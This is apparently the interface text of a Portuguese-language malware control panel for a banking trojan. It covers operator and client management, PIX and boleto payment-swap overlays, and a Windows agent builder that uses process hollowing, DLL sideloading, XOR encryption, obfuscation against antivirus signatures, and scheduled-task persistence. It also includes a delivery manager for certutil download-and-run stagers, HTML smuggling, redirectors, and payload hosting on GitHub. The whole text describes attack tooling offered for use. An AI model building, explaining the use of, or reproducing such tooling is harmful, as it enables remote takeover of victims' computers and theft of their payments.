0 em atividade
Últimos acessos
0Operadores
0aguardando eventos
0 presentes / 0 fora
saldos · movimentações · trocas
Trocas PIX / Boleto
0overlays · espera · recortes
Campos de entrada
Botão OK
Após OK → espera
Área QR
Área do recorte
Área QR
identidade · enlace · operadores
Ícone, banner e título usados no login, topbar e overlay de sessão. Alterações aplicam na hora.
Dois subdomínios separados (você define os nomes):
Relay/C2 (ex. connect) e Build API (ex. api) para SFX / hook / payload.
Ambos A records ficam proxied. O TXT criptografado usa só o domínio do relay.
Gera o blob, publica em /api/dns-txt (via domínio Build API) e preenche
Build → URL1. Não precisa colar em lugar nenhum.
Receba alerta no Telegram quando um sinal entrar em Logs.
Popup nativo do Windows (Central de Ações) e do navegador. O toast da página continua aparecendo. Em HTTP o Windows bloqueia o popup — use HTTPS.
Cadastro de sites para detecção (URL e/ou título). A limpeza automática fica em Rastro limpo auto.
| Nome | Padrões | Detectar | Processo | ID | Ações |
|---|
| Site | Padrões | Ações |
|---|
AUTO-BAN (identificação :8880) e HTTP-BAN (rate limit :8081). O relay guarda o ban em memória — desbanir reinicia o container e limpa todos os IPs. Agentes reconectam sozinhos.
| IP | Tipo | Motivo | Desde | Expira | Ação |
|---|
| Usuário | Role | Owner | Clientes | Criado por | Ações |
|---|
📌 Atribuir Cliente a Operador
Cada operador pode ter sua própria conexão (Worker/domínio) independente. Aqui você vê o status de todos.
| Usuário | Role | Worker | Domínio | Online | Total |
|---|
Build
Geração remota do agente Windows (x64 / x86)
V2: ZIP = Host+DLL. V3–V7: payload puro (sem host sideload).
Desmarcado = cliente completo. Marcado = núcleo leve (só conexão / heartbeat / detecção).
Memory: ZIP com EXE + .ps1 + .dat (mesma pasta). EXE só inicia o PowerShell; PE nunca em claro.
Memory: PE só em RAM (hollow). Drop abaixo só vale se mudar o método de execução.
Ofusca o VBS e varia decode/execução para reduzir assinaturas estáticas.
Processo legítimo usado no hollow (testado: notepad.exe).
Par que vai no ZIP e que você abre primeiro. Independente de persistência — funciona sozinho.
ZIP = Host.exe + DLL apenas. Sem persistência marcada, é só isso (mais hook embutido se escolher abaixo).
Dispara na thread principal só na abertura via isca (ZIP). Não abre no boot da persistência (schtasks).
Cria o processo suspenso, injeta o payload e redireciona a execução. CREATE NO WINDOW usa a flag Win32 no CreateProcess (sem janela de console).
Desligado: só o ZIP de abertura. Ligue para configurar um outro Host.exe + DLL (não é o do ZIP).
ZIP continua com o par de abertura. Persistência embute seu Host+DLL e dropa na pasta + schtasks. Nomes podem ser diferentes do ZIP.
Não criptografa Host.exe nem a DLL. Só carrega hook em RAM no Assumir controle.
Somente baixar exige Hollow ativo + BUILD_PUBLIC_URL (domínio CF). Bin Mode exige Stager + Hollow e publica payload.bin XOR (auto). URL estável /api/payload/<id>.
Nenhuma opção abaixo criptografa o Host.exe nem a seção de código. Só mudam fingerprint da DLL / build.
.text (código) + stub de decrypt · OXM1 v2 (chave 16 bytes)Chave = 32 chars hex (16 bytes). Stride desligado = TEXT_XOR sem inflar o arquivo. Stride ligado (ex. 8) = .rsrc bem maior. Host.exe sempre em claro.
ZIP base continua Host + DLL. Extras só acrescentam debug. HostExitGuard padrão segura o host uns segundos. Forte = mais detecção; use só se o host ainda morrer rápido.
Legado: regenera tabelas de strings. No V2 fica no card Assinatura.
Análise hard: IAT + delay + strings + manifest embutido. Para DLLs que só existem na pasta (e o EXE carrega sem estar no IAT), selecione também a pasta original do host.
| Quando | Job | XOR | SEED | Task | ZIP hash |
|---|---|---|---|---|---|
| Carregue o histórico... | |||||
Aguardando...
Encripta host:porta para o conteúdo do TXT/JS remoto (não altera o EXE).
WinRAR e 7-Zip fazem Path + Silent + Setup. Aqui usamos 7-Zip SFX no servidor. Envie quantos arquivos quiser (qualquer formato). O .exe extrai no destino e pode rodar um deles.
Host + DLLs (incluindo a de sideload) ficam no SFX. Após extrair, o config roda o Host direto (RunProgram).
Aguardando...
Envie os arquivos do pacote (host, DLLs, etc.). O ISCC compila um setup.exe com path de instalação, modo silencioso e execução pós-instalação. Sideload DLL é staged na VPS como no SFX.
Aguardando...
Delivery Manager
Stager BAT (certutil), HTML smuggling e redirectors para entrega de payloads.
Stager BAT
Gera .bat que baixa uma origem e executa. Escolha só um tipo de fonte.
HTML Smuggling
Gera página HTML com o binário embutido (base64). Escolha só uma fonte.
Redirectors
URLs intermediárias para redirecionar downloads.
Payload Manager
URLs e arquivos servidos em /api/payload/<id> para DLLs stager.
| ID | Nome | Arch | Destino | Link | |
|---|---|---|---|---|---|
| Carregando... | |||||
Gerador de Link
Upload para GitHub Releases / Contents e gera URL direta de download.
1) Crie um PAT em GitHub → Settings → Developer settings → Personal access tokens
(classic: escopo repo, ou fine-grained: Contents Read and write no repo).
2) Cole abaixo e clique Conectar — detectamos usuário e listamos repos.
3) Escolha o repo e faça upload.
Preferível repo público para o link abrir sem login. Owner/repo são preenchidos automaticamente.
Upload
Público: aparece em Releases. Não listado: caminho oculto no repo (não sai em Releases; link direto funciona; ~95 MB max).